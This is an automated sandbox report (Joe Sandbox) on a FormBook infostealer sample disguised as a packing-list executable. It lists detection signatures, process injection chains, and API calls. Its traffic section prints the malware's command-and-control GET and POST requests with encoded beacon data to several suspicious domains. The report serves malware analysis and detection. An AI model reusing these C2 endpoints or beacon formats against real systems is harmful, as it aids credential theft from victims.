Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
packing list G25469.exe

Overview

General Information

Sample name:packing list G25469.exe
Analysis ID:1562306
MD5:22063492b30a1ba8f06c735399a8edc2
SHA1:deedf469eeed1d7c2a198afd74cccc6455c4cc65
SHA256:6ee23e911640ca040e86f71845a05995289b32fa80fa487a1d125357c8da99de
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • packing list G25469.exe (PID: 3840 cmdline: "C:\Users\user\Desktop\packing list G25469.exe" MD5: 22063492B30A1BA8F06C735399A8EDC2)
    • svchost.exe (PID: 4764 cmdline: "C:\Users\user\Desktop\packing list G25469.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • RUaXGIhjtGYK.exe (PID: 2352 cmdline: "C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sort.exe (PID: 7056 cmdline: "C:\Windows\SysWOW64\sort.exe" MD5: D0D6250804C3102A17051406BBDBF3D6)
          • RUaXGIhjtGYK.exe (PID: 2140 cmdline: "C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4696 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.3344117525.00000000053D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2529387256.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3342301156.0000000002910000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.3340903495.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2531035516.0000000003C50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\packing list G25469.exe", CommandLine: "C:\Users\user\Desktop\packing list G25469.exe", CommandLine|base64offset|contains: +-, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\packing list G25469.exe", ParentImage: C:\Users\user\Desktop\packing list G25469.exe, ParentProcessId: 3840, ParentProcessName: packing list G25469.exe, ProcessCommandLine: "C:\Users\user\Desktop\packing list G25469.exe", ProcessId: 4764, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\packing list G25469.exe", CommandLine: "C:\Users\user\Desktop\packing list G25469.exe", CommandLine|base64offset|contains: +-, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\packing list G25469.exe", ParentImage: C:\Users\user\Desktop\packing list G25469.exe, ParentProcessId: 3840, ParentProcessName: packing list G25469.exe, ProcessCommandLine: "C:\Users\user\Desktop\packing list G25469.exe", ProcessId: 4764, ProcessName: svchost.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: packing list G25469.exeReversingLabs: Detection: 76%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3344117525.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2529387256.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3342301156.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3340903495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2531035516.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3342241743.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2531101341.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3342260873.0000000005000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: packing list G25469.exeJoe Sandbox ML: detected
                Source: packing list G25469.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: sort.pdb source: svchost.exe, 00000002.00000003.2495787704.0000000003213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2529708363.0000000003200000.00000004.00000020.00020000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000004.00000002.3341601587.0000000001478000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RUaXGIhjtGYK.exe, 00000004.00000002.3340899209.00000000007FE000.00000002.00000001.01000000.00000005.sdmp, RUaXGIhjtGYK.exe, 00000007.00000002.3340901611.00000000007FE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: packing list G25469.exe, 00000000.00000003.2098142445.0000000003810000.00000004.00001000.00020000.00000000.sdmp, packing list G25469.exe, 00000000.00000003.2104866958.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2530579448.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427068611.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2530579448.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2429239626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000002.3342626870.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2531172334.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000002.3342626870.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2533169764.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: packing list G25469.exe, 00000000.00000003.2098142445.0000000003810000.00000004.00001000.00020000.00000000.sdmp, packing list G25469.exe, 00000000.00000003.2104866958.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2530579448.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427068611.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2530579448.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2429239626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sort.exe, sort.exe, 00000005.00000002.3342626870.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2531172334.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 00000005.00000002.3342626870.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 00000005.00000003.2533169764.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: sort.exe, 00000005.00000002.3343142267.000000000325C000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 00000005.00000002.3341193924.000000000056D000.00000004.00000020.00020000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000007.00000000.2602904501.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2825868068.00000000234EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sort.pdbGCTL source: svchost.exe, 00000002.00000003.2495787704.0000000003213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2529708363.0000000003200000.00000004.00000020.00020000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000004.00000002.3341601587.0000000001478000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: sort.exe, 00000005.00000002.3343142267.000000000325C000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 00000005.00000002.3341193924.000000000056D000.00000004.00000020.00020000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000007.00000000.2602904501.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2825868068.00000000234EC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B76CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B76CA9
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00B760DD
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00B763F9
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B7EB60
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B7F5FA
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7F56F FindFirstFileW,FindClose,0_2_00B7F56F
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B81B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B81B2F
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B81C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B81C8A
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B81F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B81F94
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_0041C550 FindFirstFileW,FindNextFileW,FindClose,5_2_0041C550
                Source: C:\Windows\SysWOW64\sort.exeCode function: 4x nop then xor eax, eax5_2_00409E90
                Source: C:\Windows\SysWOW64\sort.exeCode function: 4x nop then pop edi5_2_0040E1A2
                Source: C:\Windows\SysWOW64\sort.exeCode function: 4x nop then pop edi5_2_00422678
                Source: C:\Windows\SysWOW64\sort.exeCode function: 4x nop then mov ebx, 00000004h5_2_02A104E0

                Networking

                barindex
                Source: DNS query: www.reglagrisi.xyz
                Source: DNS query: www.reglagrisi.xyz
                Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B84EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00B84EB5
                Source: global trafficHTTP traffic detected: GET /34mw/?66yHIJy0=lV2cRmnx0FXilEhPfZpPq92dnG52j/QoqXjGTFXGCyRw3OEGJ+HF1fmQ5H3Wo7ce76AoiMuOhG4wkWS+FEimc0ozfubLJga7WYw3/1RzG4ZgP834S4sDnL3IAG89uzHPig==&kb0=y00p-fqpV0lDx HTTP/1.1Host: www.pemedee.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0zz8/?66yHIJy0=7cEP14LQRsmKYf0RxKlrVIQIxmtU9D+RldOl4BCMwEJUAVNxY1goksq2QoLfI57UCvTcV6taODognwi8704pJ4gcp3yiRXYMqiAP6sz3W4747Aq9y3ZRdxST32LjlURtCA==&kb0=y00p-fqpV0lDx HTTP/1.1Host: www.reglagrisi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gvzn/?66yHIJy0=o7KupOcAdWG3nNYrbq63Y8DzVnVB0qlwhMl7Hzztm2YkQ+XZ5fWrExX6f74/Q+gqqRwMkXMPRKrB5xjKrizfc0njWqGlsy1S02QFwmKvno45o6r8NJKsDvPhV7F8JiCX6A==&kb0=y00p-fqpV0lDx HTTP/1.1Host: www.doodmuhendislik.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qttd/?66yHIJy0=ZvCBpOBACo8OAP3s1LOntf8DB/mM6FnXsWNgstfKSYdbGQSfJ8wq0qnRN0l90UAeuSPeR5WzZqkUYpE1Yg3SfGIW8QzsnQZV+EE7c+vVMu1pn444qRf10NViSNzmoeqFEg==&kb0=y00p-fqpV0lDx HTTP/1.1Host: www.cognetix.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /z4gi/?66yHIJy0=tobef8QUjNtUGsCsZYmGO1WvWH56aIAOgrSm2aMJLZ6iUqk1KnrnzENErAzxTvM0Kt9VGCxiYM8pqeYnhdhOa5dKpcotDhPK6/abxg2wjtQ4wVR0RbZFA0B3ye13cpOI8A==&kb0=y00p-fqpV0lDx HTTP/1.1Host: www.zripidro-priek.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.pemedee.shop
                Source: global trafficDNS traffic detected: DNS query: www.reglagrisi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.doodmuhendislik.online
                Source: global trafficDNS traffic detected: DNS query: www.cognetix.website
                Source: global trafficDNS traffic detected: DNS query: www.zripidro-priek.sbs
                Source: unknownHTTP traffic detected: POST /0zz8/ HTTP/1.1Host: www.reglagrisi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeCache-Control: no-cacheOrigin: http://www.reglagrisi.xyzReferer: http://www.reglagrisi.xyz/0zz8/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 36 36 79 48 49 4a 79 30 3d 32 65 73 76 32 4d 76 62 5a 36 7a 70 52 66 38 6c 6c 4d 4e 70 63 4c 39 42 2b 41 38 52 6c 42 43 61 34 66 2b 5a 2b 46 47 37 68 52 30 50 49 56 35 64 58 6d 35 78 34 4d 65 31 52 62 50 61 65 37 66 30 43 64 54 4f 58 70 6c 71 4f 41 38 69 6d 79 75 69 35 77 38 73 41 76 67 6d 68 30 2b 6a 53 44 38 77 6a 6e 4a 56 30 39 7a 6b 65 50 75 48 31 45 43 2f 35 6c 74 30 66 6b 47 33 33 58 44 36 75 47 51 54 63 4e 54 4e 79 39 4e 4d 6d 6b 31 2f 58 52 52 64 7a 53 33 51 37 43 4f 77 2b 6d 77 79 69 47 33 74 49 53 35 51 76 4e 31 37 49 6d 47 38 35 61 4c 76 2f 73 30 73 43 47 34 6d 5a 45 35 78 36 77 69 53 36 68 44 31 69 66 51 3d Data Ascii: 66yHIJy0=2esv2MvbZ6zpRf8llMNpcL9B+A8RlBCa4f+Z+FG7hR0PIV5dXm5x4Me1RbPae7f0CdTOXplqOA8imyui5w8sAvgmh0+jSD8wjnJV09zkePuH1EC/5lt0fkG33XD6uGQTcNTNy9NMmk1/XRRdzS3Q7COw+mwyiG3tIS5QvN17ImG85aLv/s0sCG4mZE5x6wiS6hD1ifQ=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 25 Nov 2024 12:45:35 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-25T12:45:40.2931095Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 25 Nov 2024 12:45:50 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-25T12:45:55.6671028Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:45:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:46:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:46:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
